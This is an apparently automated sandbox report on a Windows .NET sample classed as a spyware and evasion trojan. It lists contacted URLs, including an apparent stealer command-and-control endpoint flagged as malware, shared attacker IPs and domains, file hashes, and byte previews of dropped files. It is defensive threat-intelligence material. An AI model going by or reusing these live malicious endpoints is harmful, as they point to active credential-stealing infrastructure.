                                                              https://undesirabkel.click/apiG5s_aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://undesirabkel.click/apiamaspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaaspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://upx.sf.netAmcache.hve.4.drfalse
                                                                      high
                                                                      http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://undesirabkel.click/api:5aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.microaspnet_regiis.exe, 00000002.00000003.1837352702.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.microsofaspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://undesirabkel.click/#aspnet_regiis.exe, 00000002.00000003.1806512102.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796892734.0000000002B33000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796850904.0000000002B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            188.114.96.3
                                                                                            undesirabkel.clickEuropean Union
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1584118
                                                                                            Start date and time:2025-01-04 09:41:04 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 5m 58s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:9
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:9cOUjp7ybm.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@5/7@1/1
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 96%
                                                                                            • Number of executed functions: 33
                                                                                            • Number of non-executed functions: 60
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29, 40.126.32.76, 20.12.23.50, 13.107.246.45
                                                                                            • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            03:41:59API Interceptor8x Sleep call for process: aspnet_regiis.exe modified
                                                                                            03:42:01API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            188.114.96.3Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • filetransfer.io/data-package/u7ghXEYp/download
                                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.mffnow.info/1a34/
                                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.mydreamdeal.click/1ag2/
                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.questmatch.pro/ipd6/
                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • filetransfer.io/data-package/I7fmQg9d/download
                                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.rtpwslot888gol.sbs/jmkz/
                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            undesirabkel.clickPASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.30.13
                                                                                            WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.30.13
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUShttp://livedashboardkit.infoGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.166.199
                                                                                            4.elfGet hashmaliciousUnknownBrowse
                                                                                            • 1.13.111.69
                                                                                            31.13.224.14-mips-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                            • 1.4.15.193
                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            download.bin.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.112.1
                                                                                            https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                            • 104.18.94.41
                                                                                            https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832Get hashmaliciousKnowBe4Browse
                                                                                            • 104.18.90.62
                                                                                            hthjjadrthad.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.85.66
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            download.bin.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            hthjjadrthad.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.96.3
                                                                                            HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • 188.114.96.3
                                                                                            same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                            • 188.114.96.3
                                                                                            nayfObR.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            7z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            No context
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.9899121708814769
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:ZPF5LXWPakhedHjtkMldvxmoijCQXIDcQvc6QcEVcw3cE/H+BHUHZ0ownOgHkEwV:xGDhedxkd0BU/qaGpezuiFcMZ24IO8q
                                                                                            MD5:751FBAD4185099B00EB558FC12665505
                                                                                            SHA1:3234BC93FB62EC839D03994C69FA3721133D95C0
                                                                                            SHA-256:3E6316DBB009F788BC2E65D738E2AD80D6A2BAD6F104EC6834F7BB958FB7E8F3
                                                                                            SHA-512:6963DF8F56DCED2D8678C993D8469EDA078030841718BE27DD86F2FAA07FEBB6AA6B6F736ABCFC442F5648E463219530EC86D3A72B15CB5B8306FC392B17AE1C
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.5.3.7.1.9.0.6.4.7.9.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.5.3.7.1.9.5.4.9.1.7.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.c.7.4.7.2.8.-.2.6.4.e.-.4.1.f.0.-.b.f.2.f.-.0.0.e.c.c.5.b.f.4.e.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.9.9.1.c.a.4.-.8.7.c.a.-.4.2.f.9.-.b.2.2.2.-.0.4.c.5.c.5.4.d.7.5.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.c.O.U.j.p.7.y.b.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Q.u.i.n.n.S.a.m.u.e.l.Y.v.o.n.n.e...l.n.k.n.x.L.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.0.-.0.0.0.1.-.0.0.1.4.-.3.7.8.8.-.f.5.8.3.8.4.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.9.0.0.1.8.c.8.9.3.1.4.8.6.2.1.6.0.8.a.e.a.d.2.7.0.0.1.c.d.c.9.0.0.0.0.0.0.0.0.!.0.0.0.0.c.d.b.7.a.e.f.7.f.7.a.0.5.4.3.0.d.3.2.3.c.0.0.
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Sat Jan 4 08:41:59 2025, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):197190
                                                                                            Entropy (8bit):3.3460013108985334
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:mMyEyz2GYcXzpN4uE2aOuM73dVyLTg3Bo0ZdCDQ/oRGuKF:zyPzHYu4uEqH3dVyLTg3BoZQE1K
                                                                                            MD5:D06B78567D155092D9FC7103023B547A
                                                                                            SHA1:09CFDFF0FB0A8AC0AEF6A43F9B242D566628A473
                                                                                            SHA-256:94CF334979F8574FD285E5EE12023CF7DE731E32C158BB2A1AD8E4B98C72FDD7
                                                                                            SHA-512:E15F56DFFDF8299BFE7A57A48FDE372C92D68E20A2932DF5349768895BB1A6463D78366667EF62EF3B92B7E0E2348F90DBA00E54246CA2832854404B016CD63A
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:MDMP..a..... .......W.xg............D...............X.......$................J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T...........V.xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8416
                                                                                            Entropy (8bit):3.710386919517836
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJ8v6s6Y9iSUThcZgmfZPYnprT89bD8sf0cBm:R6lXJE6s6Y4SUTKZgmfBYuDPf6
                                                                                            MD5:246624BE1787D3C8E4086D7385983C59
                                                                                            SHA1:1E25EDB2F84CA54557C159043E192C5752844A14
                                                                                            SHA-256:2FC30936B9DAE863FAE91A5DC44B7FEFA440D6ACC8234B5F4FD06A98ABD134FD
                                                                                            SHA-512:4E6030E314663D748D9B66A51607F682D4D31EE26618FC51620F8800A296ED7286C2E102EAA4C1254304939F5317C1555CD2AD9CA9660A1ECAEEC69B6E73D504
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.1.6.<./.P.i.
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4782
                                                                                            Entropy (8bit):4.533316435586078
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zseiJg77aI9liWpW8VYtcYm8M4J92Ft0+q8v2ahIpd3Nud:uIjfewI7Pj7VU5JvKjKpd3Nud
                                                                                            MD5:21BE0A5846D39696BA300D746EB2BA02
                                                                                            SHA1:5B18E49595EB126C6F52E5B95E0BA2CCD22834AD
                                                                                            SHA-256:7515FF15D7457EE517ACFD0B1D038F6FFB423DEFB71E99BEAA6A860C8E051DB3
                                                                                            SHA-512:B139DD85570D9E95C42FB229CCB01307302F14E8AA287E79E39F64473363163DA28E209A7C029BF6C41B9666A85B84B1C31585435391C7CF372E858EB65AA6D6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="660944" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                            Process:C:\Users\user\Desktop\9cOUjp7ybm.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):441856
                                                                                            Entropy (8bit):7.099141129436754
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:Op8zdbqWi+wkHXZa+PkbCo0GDLob06QUQDCP2/lSWM5W:OGA+DHXZ10do06QUQDB/lU
                                                                                            MD5:64C287959FF0DBD10DB81BDED030A3A1
                                                                                            SHA1:ACF88011455FC98D0DE186520B4DDDE5D1CF5F75
                                                                                            SHA-256:673E0EFEE492A6A82AFCCE12545C4A2D46A1E9E827C33B7A1E9F0A904656A458
                                                                                            SHA-512:D7CA03F8032E7C9D5882EAD046C33388D5EBBA5923ABD95C3C535945BA4AA8A1FE6E47D116DD9376C6717A36BFF5AC0D0DCFC599526A5FC89D81C3FD3B0517C2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                            Reputation:low
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L....ug...........!.........:............................................................@.............................|.......P...............................x...\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data...............................@....reloc..x...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.465660386383278
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:9IXfpi67eLPU9skLmb0b4hWSPKaJG8nAgejZMMhA2gX4WABl0uNudwBCswSbd:uXD94hWlLZMM6YFHI+d
                                                                                            MD5:008DCCD74F98C7BF020692781A4B58CF
                                                                                            SHA1:9C9EFB0208D8C5D80CB8CBF4A54C0EA856E6D5CA
                                                                                            SHA-256:4A9E21A61F1EFD97F9AAC9BC955FC07F17466252B5CD269BE3F781EDE05EEA04
                                                                                            SHA-512:C148BDF83277500077E9ECCA72A17130D2AEB7611D8C4CE7F5483FA889E63F35D2339035BA9D2DEB0009F07F503FA13916EF3C55BDF02CAA12B550145764D132
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...^............................................................................................................................................................................................................................................................................................................................................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\9cOUjp7ybm.exe
                                                                                            File Type:ASCII text, with very long lines (353), with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1414
                                                                                            Entropy (8bit):4.538550000655599
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7v74NulAMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T44AMff2p8p14nrPKktp
                                                                                            MD5:6C17A359AD8E630345A9D8CE92776AD6
                                                                                            SHA1:1AB1D85A67065B77B1983436621D81F953311ECD
                                                                                            SHA-256:FD509D91FE69EC3C4FD468CC55435F09AE046D38234EE12174AAC9BA9B3E35C0
                                                                                            SHA-512:A9B7F1222AB96D2A221C4956F89733A801FDFC071010620359976AEABD2CEB77766F1038388DB449E28C8995B9F8A9126CE5376FAF0F3D88BA122CDEC7C28058
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "QuinnSamuelYvonne" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStr
                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.641236463464292
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:9cOUjp7ybm.exe
